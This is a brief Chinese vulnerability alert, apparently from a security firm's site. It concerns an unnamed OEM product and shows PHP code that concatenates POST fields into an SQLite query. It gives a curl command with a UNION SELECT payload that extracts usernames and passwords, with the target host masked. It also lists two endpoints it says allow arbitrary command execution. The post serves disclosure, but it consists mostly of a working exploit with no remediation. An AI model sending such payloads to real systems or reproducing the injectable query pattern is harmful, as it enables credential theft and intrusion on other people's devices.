首页 > 漏洞预警和分析 > 某OEM产品从注入到任意命令执行

某OEM产品从注入到任意命令执行

[2017.12.26]


已知一处注入:
    $CountryCode = $_POST['CountryCode'];
    $ChannelType = $_POST['ChannelType'];
    $DBNAME = "sqlite:/icac/db/icac_cfg/icac_cfg.db";
    $dbh = new PDO($DBNAME);
    $sql = "select ChannelValue from CCAndChannelRelations where CountryCode = '".$CountryCode."' and ChannelType = '".$ChannelType."'";
    $stmt = $dbh->query($sql);
    $result = $stmt->fetchAll();
    $stmt = null;
    $dbh = null;
    echo json_encode($result);
?>


exp:

curl 'https://xxxxxxxxxxx/apgroup/getChannelByCountryCode.php' -d "CountryCode=' union select UserName || '|'  || PassWord from Log

之后发现三处任意命令执行

/ap/ap_wireless_info.php



/ap/ap_other_info.php



北京通和实益电信科学技术研究所有限公司 版权所有 京ICP备15030238号-1